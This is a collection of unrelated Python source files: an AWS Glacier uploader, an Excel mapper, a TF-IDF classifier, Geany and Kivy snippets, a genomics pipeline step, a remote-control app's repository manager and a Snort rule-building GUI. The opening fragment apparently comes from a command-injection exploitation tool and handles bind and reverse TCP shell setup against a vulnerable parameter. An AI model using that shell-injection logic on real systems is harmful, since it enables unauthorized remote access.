whitespace = settings.WHITESPACE[0]
if whitespace == " ":
whitespace = urllib.quote(whitespace)
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
end = time.time()
diff = end - start
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG, cmd)
if settings.REVERSE_TCP and (int(diff) > 0 and int(diff) < 6):
check_established_connection()
else:
if settings.VERBOSITY_LEVEL == 1:
print ""
err_msg = "The " + os_shell_option.split("_")[0] + " "
err_msg += os_shell_option.split("_")[1].upper() + " connection has failed!"
print settings.print_critical_msg(err_msg)
"""
Configure the bind TCP shell
"""
def bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE):
settings.BIND_TCP = True
# Set up RHOST / LPORT for the bind TCP connection.
bind_tcp.configure_bind_tcp()
if settings.BIND_TCP == False:
if settings.REVERSE_TCP == True:
os_shell_option = "reverse_tcp"
reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
while True:
if settings.RHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_bind_tcp_options(settings.RHOST)
else:
cmd = bind_tcp.bind_tcp_options()
result = checks.check_bind_tcp_options(cmd)
if result != None:
if result == 0:
go_back_again = False
elif result == 1 or result == 2:
go_back_again = True
settings.BIND_TCP = False
elif result == 3:
settings.BIND_TCP = False
reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
# execute bind TCP shell
execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE)
"""
Configure the reverse TCP shell
"""
def reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE):
settings.REVERSE_TCP = True
# Set up LHOST / LPORT for the reverse TCP connection.
reverse_tcp.configure_reverse_tcp()
if settings.REVERSE_TCP == False:
if settings.BIND_TCP == True:
os_shell_option = "bind_tcp"
bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
while True:
if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS:
result = checks.check_reverse_tcp_options(settings.LHOST)
else:
cmd = reverse_tcp.reverse_tcp_options()
result = checks.check_reverse_tcp_options(cmd)
if result != None:
if result == 0:
go_back_again = False
elif result == 1 or result == 2:
go_back_again = True
settings.REVERSE_TCP = False
elif result == 3:
settings.REVERSE_TCP = False
bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
#reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again)
return go_back, go_back_again
# execute reverse TCP shell
execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, payload, OUTPUT_TEXTFILE)
"""
Check commix shell options
"""
def check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again, payload, OUTPUT_TEXTFILE):
os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result)
if os_shell_option == "back" or os_shell_option == True or os_shell_option == False:
go_back = True
if os_shell_option == False:
go_back_again = True
return go_back, go_back_again
# The "os_shell" option
elif os_shell_option == "os_shell":
warn_msg = "You are already into the '" + os_shell_option + "' mode."
print settings.print_warning_msg(warn_msg)
return go_back, go_back_again
# The "bind_tcp" option
elif os_shell_option == "bind_tcp":
go_back, go_back_again = bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
# The "reverse_tcp" option
elif os_shell_option == "reverse_tcp":
go_back, go_back_again = reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again, payload, OUTPUT_TEXTFILE)
return go_back, go_back_again
# The "quit" option
elif os_shell_option == "quit":
sys.exit(0)
else:
return go_back, go_back_again
|
from boto.glacier.layer1 import Layer1
from boto.glacier.concurrent import ConcurrentUploader
import sys
import os.path
from time import gmtime, strftime
access_key_id = "xxx"
secret_key = "xxx"
target_vault_name = "xxx"
inventory = "xxx"
fname = sys.argv[1]
fdes = os.path.basename(sys.argv[1])
if not os.path.isfile(fname) :
print("Can't find the file to upload")
sys.exit(-1);
glacier_layer1 = Layer1(aws_access_key_id=access_key_id, aws_secret_access_key=secret_key, is_secure=True)
uploader = ConcurrentUploader(glacier_layer1, target_vault_name, part_size=128*1024*1024, num_threads=1)
archive_id = uploader.upload(fname, fdes)
f = open(inventory, 'a+')
f.write(archive_id+'\t'+fdes+'\n')
f.close()
sys.exit(0);
|
from shutil import copyfile
from datetime import datetime
from ExcelMapper.mapper import *
import xlrd
import xlsxwriter
row_rules_sheet1_t1 = {
'found "risk"': lambda data: 'risk' in data['type'],
'found "Risk"': lambda data: 'Risk' in data['type'],
'found "reward"(ignore letter casing)': lambda data: 'reward' in data['type'].lower() or 'reward' in data['type'].lower()}
row_rules_sheet1_t2 = row_rules_sheet1_t1
col_rules_sheet1_t1 = {
'"high"' : lambda data: 'high' in data['amount'],
#'return true' : lambda data: True,
'return false' : lambda data: False}
col_rules_sheet1_t2 = {
'found "low"' : lambda data: 'low' in data['amount'],
'return true' : lambda data: True,
'return false' : lambda data: False}
row_rules_sheet2_t3 = {
'found "fire"': lambda data: 'fire' in data['type'],
'found "Fire"': lambda data: 'Fire' in data['type'],
'found "damage"(ignore letter casing)': lambda data: 'damage' in data['type'].lower()}
col_rules_sheet2_t3 = {
'"low"' : lambda data: 'low' == data['amount'],
'"high"': lambda data: 'high' == data['amount']}
def main():
date = str(datetime.now().date())
print "Maping"
excel_template = xlrd.open_workbook("map.xlsx")
copyfile('map.xlsx', "map {}.xlsx".format(date))
excel_data = xlrd.open_workbook("data.xlsx")
t1_excel_mapper = create_mapper(wb=excel_template,table_index=1,row_rules=row_rules_sheet1_t1,col_rules=col_rules_sheet1_t1)
t1_output_data = t1_excel_mapper.run(excel_data)
t2_excel_mapper = create_mapper(wb=excel_template,table_index=2,row_rules=row_rules_sheet1_t2,col_rules=col_rules_sheet1_t2)
t2_output_data = t2_excel_mapper.run(excel_data)
t3_excel_mapper = create_mapper(wb=excel_template,table_index=3,row_rules=row_rules_sheet2_t3,col_rules=col_rules_sheet2_t3)
t3_output_data = t3_excel_mapper.run(excel_data)
workbook = xlsxwriter.Workbook('output {}.xlsx'.format(date))
worksheet = workbook.add_worksheet()
for (row,col),results in t1_output_data.iteritems():
worksheet.write(row, col,len(results))
for (row,col),results in t2_output_data.iteritems():
worksheet.write(row, col,len(results))
worksheet = workbook.add_worksheet()
for (row,col),results in t3_output_data.iteritems():
worksheet.write(row, col,len(results))
workbook.close()
print "Done."
def clone_sheet(to_clone_sheet,new_sheet):
for row in range(0,to_clone_sheet.nrows):
for col in range(0,to_clone_sheet.ncols):
new_sheet.write(row,col,to_clone_sheet.cell_value(row, col))
if __name__ == "__main__":
main()
|
import pandas as pd
df = pd.read_csv('data/Reviews.csv')
print(df.head(3))
print(df['Text'].head(2))
from sklearn.feature_extraction.text import TfidfVectorizer
tfidf = TfidfVectorizer()
print(tfidf)
print(tfidf.fit(df['Text']))
X = tfidf.transform(df['Text'])
print(X)
print([X[1, tfidf.vocabulary_['peanuts']]])
print([X[1, tfidf.vocabulary_['jumbo']]])
print([X[1, tfidf.vocabulary_['error']]])
import numpy as np
df.dropna(inplace=True)
df[df['Score'] != 3]
df['Positivity'] = np.where(df['Score'] > 3, 1, 0)
cols = ['Id', 'ProductId', 'UserId', 'ProfileName', 'HelpfulnessNumerator', 'HelpfulnessDenominator', 'Score', 'Time', 'Summary']
df.drop(cols, axis=1, inplace=True)
df.head(3)
from sklearn.model_selection import train_test_split
X = df.Text
y = df.Positivity
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state = 0)
print("Train set has total {0} entries with {1:.2f}% negative, {2:.2f}% positive".format(len(X_train),
(len(X_train[y_train == 0]) / (len(X_train)*1.))*100,
(len(X_train[y_train == 1]) / (len(X_train)*1.))*100))
print("Test set has total {0} entries with {1:.2f}% negative, {2:.2f}% positive".format(len(X_test),
(len(X_test[y_test == 0]) / (len(X_test)*1.))*100,
(len(X_test[y_test == 1]) / (len(X_test)*1.))*100))
|
from __future__ import print_function
import gettext
import gi
gi.require_version('Peas', '1.0')
from gi.repository import GObject
from gi.repository import Peas
from gi.repository import Peasy
from gi.repository import Geany
gettext.bindtextdomain("peasy", "/home/kugel/dev/geany.git/build-linux/dest/share/locale")
gettext.textdomain("peasy")
_ = gettext.gettext
class PeasyPyTester(Peasy.Plugin, Peasy.PluginHelp):
__gtype_name = 'PeasyPyTester'
object = GObject.property(type=GObject.Object)
# why is this needed!?
plugin_info = GObject.property(type=Peas.PluginInfo)
doc = None
def on_closed(self, obj, d):
print(d.display_name() + " closed")
self.doc = None
def do_enable(self):
print("do_enable: " + gettext.dgettext("peasy", "Hello from %s!") % self.props.plugin_info.get_name())
self.doc = Geany.Document.new_file("foo")
self.geany_plugin.geany_data.object.connect("document-close", self.on_closed)
return True
def do_disable(self):
print("do_disable: " + _("%s says bye!") % self.props.plugin_info.get_name())
if (self.doc and self.doc.is_valid):
self.doc.close()
def do_help(self):
print("Help!!")
|
from kivy.uix.widget import Widget
class HorizontalSpacer(Widget):
def __init__(self, **kwargs):
super(HorizontalSpacer, self).__init__( **kwargs)
self.size_hint_y = None
self.height=0
class VerticalSpacer(Widget):
def __init__(self, **kwargs):
super(VerticalSpacer, self).__init__( **kwargs)
self.size_hint_x = None
self.width=0
|
import os
from pypers.core.step import CmdLineStep
class ReorderSam(CmdLineStep):
spec = {
"version": "0.0.1",
"descr": [
"Runs ReorderSam to reorder chromosomes into GATK order"
],
"args":
{
"inputs": [
{
"name" : "input_bam",
"type" : "file",
"iterable" : True,
"descr" : "the input bam file",
},
{
"name" : "reference",
"type" : "ref_genome",
"tool" : "reordersam",
"descr" : "Reference whole genome fasta"
}
],
"outputs": [
{
"name" : "output_bam",
"type" : "file",
"value" : "dummy",
"descr" : "the reordered output bam",
}
],
"params": [
{
"name" : "jvm_args",
"value" : "-Xmx{{jvm_memory}}g -Djava.io.tmpdir={{output_dir}}",
"descr" : "java virtual machine arguments",
"readonly" : True
}
]
},
"cmd": [
"/usr/bin/java {{jvm_args}} -jar /software/pypers/picard-tools/picard-tools-1.119/picard-tools-1.119/ReorderSam.jar",
" I={{input_bam}} O={{output_bam}} CREATE_INDEX=True R={{reference}}"
],
"requirements": {
"memory": '8'
}
}
def preprocess(self):
"""
Set output bam name
"""
file_name = os.path.basename(self.input_bam)
self.output_bam = file_name.replace('.bam','.reord.bam')
super(ReorderSam, self).preprocess()
|
# -*- coding: utf-8 -*-
"""
ORCA Open Remote Control Application
Copyright (C) 2013-2020 Carsten Thielepape
Please contact me by : http://www.orca-remote.org/
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import annotations
import os
from typing import Union
from typing import List
from typing import Dict
from xml.etree.ElementTree import Element
from xml.etree.ElementTree import SubElement
from kivy.logger import Logger
from ORCA.ui.ShowErrorPopUp import ShowErrorPopUp
from ORCA.utils.TypeConvert import ToUnicode
from ORCA.utils.TypeConvert import EscapeUnicode
from ORCA.utils.Filesystem import AdjustPathToOs
from ORCA.utils.FileName import cFileName
from ORCA.utils.LogError import LogError
from ORCA.vars.Replace import ReplaceVars
from ORCA.vars.Access import SetVar
from ORCA.vars.Actions import Var_DelArray
from ORCA.utils.XML import XMLPrettify
from ORCA.utils.Path import cPath
from ORCA.download.RepManagerEntry import cRepManagerEntry
import ORCA.Globals as Globals
oRepositoryManager:Union[cRepositoryManager,None] = None
def RepositoryManager(oPathRepSource:cPath) -> None:
""" starts RepositoryManager, we make it global to avoid wrong garbage collection """
global oRepositoryManager
oRepositoryManager=cRepositoryManager(oPathRepSource)
oRepositoryManager.CollectAndUpload()
def CreateRepVarArray(uBaseLocalDir:str) -> None:
global oRepositoryManager
if oRepositoryManager:
oRepositoryManager.CreateRepVarArray(uBaseLocalDir)
class cRepositoryManager:
""" The Main repository manager class, which uploads all reps to the cloud """
def __init__(self,oPathRepSource) -> None:
super(cRepositoryManager, self).__init__()
self.aFiles:List[str] = []
self.aRepManagerEntries:List[cRepManagerEntry] = []
self.aZipFiles:List[Dict] = []
self.oPathRepSource:cPath = oPathRepSource
def CollectAndUpload(self) -> None:
""" Collects all Reps and uploads them """
try:
oPath:cPath = Globals.oPathTmp + "RepManager"
oPath.Delete()
self.GetOthers()
self.GetCodesets()
self.GetDefinitions()
self.GetSkins()
self.GetInterfaces()
self.GetLanguages()
self.GetSounds()
self.GetScripts()
self.GetWizardTemplates()
self.GetFonts()
self.CreateRepository()
except Exception as e:
uMsg=LogError(uMsg='Critical failure on Repository Manager ...' ,oException=e)
ShowErrorPopUp(uMessage=uMsg)
def GetOthers(self) -> None:
""" Gets all others reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
self.aFiles=(self.oPathRepSource + 'repositories/orca-remote/repositories/others').GetFileList(bSubDirs = False, bFullPath = True)
for uFn in self.aFiles:
oRepManagerEntry:cRepManagerEntry = cRepManagerEntry(oFileName=uFn)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Resource not ready for Repository Manager, skipped: '+uFn)
self.SaveRepositoryXML('others','Various ORCA resources')
def GetFonts(self) -> None:
""" Gets all others reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
aFontsFolders:List[str] = Globals.oPathFonts.GetFolderList(bFullPath=True)
for uFontFolder in aFontsFolders:
oFnFontDefinition:cFileName = cFileName(cPath(uFontFolder)) + "fonts.xml"
oRepManagerEntry:cRepManagerEntry = cRepManagerEntry(oFileName=oFnFontDefinition)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Font not ready for Repository Manager, skipped: '+oFnFontDefinition)
self.SaveRepositoryXML('fonts','Font Resources')
def GetCodesets(self) -> None:
""" Gets all codeset reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
self.aFiles=Globals.oPathCodesets.GetFileList(bSubDirs = True, bFullPath = True)
for uFn in self.aFiles:
if uFn.lower().endswith('.xml'):
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=uFn)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Codeset not ready for Repository Manager, skipped: '+uFn)
self.SaveRepositoryXML('codesets','Orca Genuine Codesets')
def GetSounds(self) -> None:
""" Gets all sounds reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
for uSound in Globals.oSound.aSoundsList:
oFnSound:cFileName = cFileName(Globals.oPathSoundsRoot + uSound) +"sounds.xml"
oRepManagerEntry:cRepManagerEntry = cRepManagerEntry(oFileName=oFnSound)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Soundset not ready for Repository Manager, skipped: '+oFnSound)
self.SaveRepositoryXML('sounds','Orca Genuine Sounds')
def GetDefinitions(self) -> None:
""" Gets all definition reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
for uDefinitionName in Globals.aDefinitionList:
oFnFile:cFileName=cFileName().ImportFullPath(uFnFullName='%s/definitions/%s/definition.xml' % (Globals.oPathRoot.string, uDefinitionName))
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=oFnFile)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Definition not ready for Repository Manager, skipped: '+oFnFile)
self.SaveRepositoryXML('definitions','Orca Genuine Definitions')
def GetLanguages(self) -> None:
""" Gets all Language reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
for uLanguage in Globals.aLanguageList:
oFn:cFileName=cFileName().ImportFullPath(uFnFullName='%s/languages/%s/strings.xml' % (Globals.oPathRoot.string, uLanguage))
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=oFn)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Language not ready for Repository Manager, skipped: '+oFn)
self.SaveRepositoryXML('languages','Orca Genuine Language Files')
def GetInterfaces(self) -> None:
""" Gets all interface reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
for uInterFaceName in Globals.oInterFaces.aObjectNameList:
oFn:cFileName=cFileName().ImportFullPath(uFnFullName='%s/interfaces/%s/interface.py' % (Globals.oPathRoot.string, uInterFaceName))
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=oFn)
if oRepManagerEntry.ParseFromSourceFile():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Interface not ready for Repository Manager, skipped: '+oFn)
self.SaveRepositoryXML('interfaces','Orca Genuine Interfaces')
def GetScripts(self) -> None:
""" Gets all scripts reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
for uScriptName in Globals.oScripts.dScriptPathList:
oFn:cFileName=cFileName(Globals.oScripts.dScriptPathList[uScriptName])+'script.py'
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=oFn)
if oRepManagerEntry.ParseFromSourceFile():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Script not ready for Repository Manager, skipped: '+oFn)
self.SaveRepositoryXML('scripts','Orca Genuine Scripts')
def GetSkins(self) -> None:
""" Gets all skins reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
for uSkinName in Globals.aSkinList:
oFn:cFileName=cFileName().ImportFullPath(uFnFullName='%s/skins/%s/skin.xml' % (Globals.oPathRoot.string, uSkinName))
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=oFn)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Skin not ready for Repository Manager, skipped: '+oFn)
self.SaveRepositoryXML('skins','Orca Genuine Skins')
def GetWizardTemplates(self) -> None:
""" Gets all wizard reps """
del self.aFiles[:]
del self.aRepManagerEntries[:]
aDirs:List[str]=(Globals.oPathRoot + u'wizard templates').GetFolderList()
for uDirName in aDirs:
aDirsSub:List[str]=(Globals.oPathRoot + (u'wizard templates/' + uDirName)).GetFolderList()
for uDirsSub in aDirsSub:
oFn:cFileName=cFileName(Globals.oPathRoot + (u'wizard templates/' + uDirName + "/" + uDirsSub)) + (uDirsSub + ".xml")
oRepManagerEntry:cRepManagerEntry=cRepManagerEntry(oFileName=oFn)
if oRepManagerEntry.ParseFromXML():
if not oRepManagerEntry.oRepEntry.bSkip:
self.aRepManagerEntries.append(oRepManagerEntry)
else:
Logger.warning('Wizard Template not ready for Repository Manager, skipped: '+oFn)
self.SaveRepositoryXML('wizard templates','Wizard Templates')
def SaveRepositoryXML(self,uType:str,uDescription:str) -> None:
""" Saves the main repository directory xml """
oVal:Element
uContent:str
uRoot:str
oPath:cPath= Globals.oPathTmp + "RepManager"
oPath.Create()
oPath=oPath+"repositories"
oPath.Create()
oPath=oPath+uType
oPath.Create()
oFnXml:cFileName=cFileName(oPath) +'repository.xml'
oXMLRoot:Element = Element('repository')
oVal = SubElement(oXMLRoot,'version')
oVal.text = '1.00'
oVal = SubElement(oXMLRoot,'type')
oVal.text = uType
oVal = SubElement(oXMLRoot,'description')
oVal.text = uDescription
oXMLEntries:Element = SubElement(oXMLRoot,'entries')
for oEntry in self.aRepManagerEntries:
Logger.debug ('Saving Repository-Entry [%s]' % oEntry.oFnEntry.string)
oEntry.oRepEntry.WriteToXMLNode(oXMLNode=oXMLEntries)
for oSource in oEntry.oRepEntry.aSources:
bZipParentDir:bool = cPath.CheckIsDir(uCheckName=oSource.uLocal)
# Create according Zip
if bZipParentDir:
uUpper:str = os.path.basename(oSource.uSourceFile)
uFinalPath:str = uType
oDest:cFileName = cFileName().ImportFullPath(uFnFullName='%s/RepManager/repositories/%s/%s' % (Globals.oPathTmp.string, uFinalPath, uUpper))
uUpper1:str = os.path.split(os.path.abspath(oSource.uLocal))[0]
uRoot = AdjustPathToOs(uPath=ReplaceVars(uUpper1)+'/')
self.aZipFiles.append({'filename':oSource.uLocal,'dstfilename':oDest.string, 'removepath':uRoot, 'skipfiles':ToUnicode(oEntry.oRepEntry.aSkipFileNames)})
else:
uDest:str = AdjustPathToOs(uPath='%s/RepManager/repositories/%s/%s.zip' % (Globals.oPathTmp.string, uType, os.path.splitext(os.path.basename(oSource.uLocal))[0]))
uRoot = AdjustPathToOs(uPath=Globals.oPathRoot.string + "/" + oSource.uTargetPath)
self.aZipFiles.append({'filename':oSource.uLocal,'dstfilename':uDest, 'removepath':uRoot})
oFSFile = open(oFnXml.string, 'w')
uContent = XMLPrettify(oElem=oXMLRoot)
uContent = ReplaceVars(uContent)
oFSFile.write(EscapeUnicode(uContent))
oFSFile.close()
def CreateRepository(self) -> None:
self.CreateZipVarArray()
SetVar(uVarName="REPMAN_BASELOCALDIR", oVarValue=(Globals.oPathTmp + "RepManager").string)
Globals.oTheScreen.AddActionToQueue(aActions=[{'string': 'call Create Repository'}])
return
def CreateZipVarArray(self) -> None:
SetVar(uVarName="REPMAN_ZIPCNTFILES", oVarValue= str(len(self.aZipFiles)))
Var_DelArray("REPMAN_ZIPSOUREFILENAMES[]")
Var_DelArray("REPMAN_ZIPDESTFILENAMES[]")
Var_DelArray("REPMAN_ZIPREMOVEPATH[]")
Var_DelArray("REPMAN_ZIPSKIPFILES[]")
Var_DelArray("REPMAN_ZIPTYPE[]")
i:int=0
for dZipFile in self.aZipFiles:
uIndex:str = str(i) + "]"
SetVar(uVarName="REPMAN_ZIPSOURCEFILENAMES[" + uIndex ,oVarValue=dZipFile['filename'])
SetVar(uVarName="REPMAN_ZIPDESTFILENAMES[" + uIndex ,oVarValue=dZipFile['dstfilename'])
SetVar(uVarName="REPMAN_ZIPREMOVEPATH[" + uIndex ,oVarValue=dZipFile['removepath'])
uSkipFiles:str = dZipFile.get('skipfiles',None)
if uSkipFiles is not None:
SetVar(uVarName="REPMAN_ZIPSKIPFILES[" + uIndex, oVarValue=dZipFile['skipfiles'])
SetVar(uVarName="REPMAN_ZIPTYPE[" + uIndex,oVarValue= "folder")
else:
SetVar(uVarName="REPMAN_ZIPTYPE[" + uIndex,oVarValue= "file")
i += 1
# noinspection PyMethodMayBeStatic
def CreateRepVarArray(self,uBaseLocalDir:str) -> None:
aLocalFiles:List[str] = cPath(uBaseLocalDir).GetFileList(bSubDirs=True, bFullPath=True)
SetVar(uVarName="REPMAN_LOCALBASENAME", oVarValue=uBaseLocalDir)
SetVar(uVarName="REPMAN_CNTFILES", oVarValue= str(len(aLocalFiles)))
Var_DelArray("REPMAN_LOCALFILENAMES[]")
i:int=0
for uLocalFile in aLocalFiles:
uIndex:str = str(i) + "]"
SetVar(uVarName="REPMAN_LOCALFILENAMES[" + uIndex ,oVarValue=uLocalFile)
i += 1
|
import sys
import math
from PyQt5 import QtWidgets
from PyQt5 import QtGui
from PyQt5 import QtCore
from mainwindow import Ui_MainWindow
from scapy.all import *
""" dump any string, ascii or encoded, to formatted hex output """
def dumpString(src, length=16):
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
result = []
for i in xrange(0, len(src), length):
chars = src[i:i+length]
hex = ' '.join(["%02x" % ord(x) for x in chars])
printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars])
result.append(["%-*s" % (length*3, hex), "%s" % (printable,)])
return result
class Snort(QtWidgets.QMainWindow):
def __init__(self):
super(Snort, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.show()
self.index = 0
self.comboBoxes = [self.ui.srcCombo, self.ui.srcPortCombo, self.ui.destCombo, self.ui.destPortCombo]
self.defaultFmt = self.ui.hexColumn.currentCharFormat()
#setup scrollbars to be synced
self.hexSlider = self.ui.hexColumn.verticalScrollBar()
self.textSlider = self.ui.textColumn.verticalScrollBar()
self.hexSlider.valueChanged.connect(self.syncScroll)
self.textSlider.valueChanged.connect(self.syncScroll)
self.ui.packetBox.valueChanged.connect(self.changePacket)
self.ui.actionOpen.triggered.connect(self.openPCAP)
self.ui.contentEdit.textChanged.connect(self.contentChanged)
self.ui.flowCheck.stateChanged.connect(self.flowChecked)
self.ui.streamButton.clicked.connect(self.assembleStream)
self.ui.flowCombo.currentTextChanged.connect(self.buildRule)
self.ui.actionCombo.currentTextChanged.connect(self.buildRule)
self.ui.protoCombo.currentTextChanged.connect(self.buildRule)
self.ui.srcCombo.currentTextChanged.connect(self.buildRule)
self.ui.srcPortCombo.currentTextChanged.connect(self.buildRule)
self.ui.dirCombo.currentTextChanged.connect(self.buildRule)
self.ui.destCombo.currentTextChanged.connect(self.buildRule)
self.ui.destPortCombo.currentTextChanged.connect(self.buildRule)
self.streams = []
def syncScroll(self, value):
self.textSlider.setValue(value)
self.hexSlider.setValue(value)
def changePacket(self):
self.index = self.ui.packetBox.value() - 1
self.readPacket()
def findStreams(self):
tcp_streams = self.packets.filter(lambda p: p.haslayer(TCP))
self.streams = []
for syn in tcp_streams.filter(lambda p: p[TCP].flags & 0x02):
for synack in tcp_streams.filter(lambda p: p[TCP].flags & 0x12 and p[TCP].ack == syn.seq + 1):
ack = tcp_streams.filter(lambda p: p[TCP].flags & 0x10 and p[TCP].ack == synack.seq + 1)
if ack:
srcport = syn[TCP].sport
dstport = syn[TCP].dport
L3 = IP
try:
#try underlayer
foot = syn[TCP].underlayer
srcip = foot.src
dstip = foot.dst
if type(foot) == IPv6:
L3 = IPv6
except:
#try other, but upper layer
if IPv6 in syn:
srcip = syn[IPv6].src
dstip = syn[IPv6].dst
L3 = IPv6
elif IP in pkt:
srcip = syn[IP].src
dstip = syn[IP].dst
else:
continue
ip_pair = (srcip,dstip)
port_pair = (srcport,dstport)
filtered_stream = tcp_streams.filter(lambda p: p[TCP].dport in port_pair and \
p[TCP].sport in port_pair and \
p[L3].src in ip_pair and \
p[L3].dst in ip_pair)
assembled_stream = [syn,synack,ack[0]]
while True:
client_next_seq = assembled_stream[-1][TCP].seq
server_next_seq = assembled_stream[-1][TCP].ack
next = filtered_stream.filter(lambda p: p.seq in (client_next_seq,server_next_seq) and \
not p in assembled_stream)
if not next:
break
for pkt in next:
assembled_stream.append(pkt)
self.streams.append(PacketList(assembled_stream))
def assembleStream(self):
pkt = self.packets[self.index]
self.ui.hexColumn.clear()
self.ui.textColumn.clear()
for stream in self.streams:
if pkt in stream:
thisStream = stream
break
streamText = "".join([str(packet) for packet in thisStream])
payload = dumpString(streamText)
for line in payload:
self.ui.hexColumn.appendPlainText(line[0])
self.ui.textColumn.appendPlainText(line[1])
def readPacket(self):
self.clearAll()
pkt = self.packets[self.index]
payload = dumpString(str(pkt))
for line in payload:
self.ui.hexColumn.appendPlainText(line[0])
self.ui.textColumn.appendPlainText(line[1])
if IP in pkt:
self.ui.protoCombo.setCurrentText("ip")
self.ui.srcCombo.insertItem(0, pkt[IP].src)
self.ui.destCombo.insertItem(0,pkt[IP].dst)
srcip = pkt[IP].src
if IPv6 in pkt:
self.ui.protoCombo.setCurrentText("ip")
self.ui.srcCombo.insertItem(0, pkt[IPv6].src)
self.ui.destCombo.insertItem(0,pkt[IPv6].dst)
srcip = pkt[IPv6].src
if TCP in pkt:
self.ui.protoCombo.setCurrentText("tcp")
self.ui.srcPortCombo.insertItem(0, str(pkt[TCP].sport))
self.ui.destPortCombo.insertItem(0, str(pkt[TCP].dport))
for stream in self.streams:
if pkt in stream:
self.ui.flowCheck.setChecked(True)
self.ui.streamButton.setEnabled(True)
client = stream[0]
if IP in client:
layer = IP
else:
layer = IPv6
if srcip == client[layer].src:
self.ui.flowCombo.setCurrentText("to_server")
elif srcip == client[layer].dst:
self.ui.flowCombo.setCurrentText("to_client")
if UDP in pkt:
self.ui.protoCombo.setCurrentText("udp")
self.ui.srcPortCombo.insertItem(0, str(pkt[UDP].sport))
self.ui.destPortCombo.insertItem(0, str(pkt[UDP].dport))
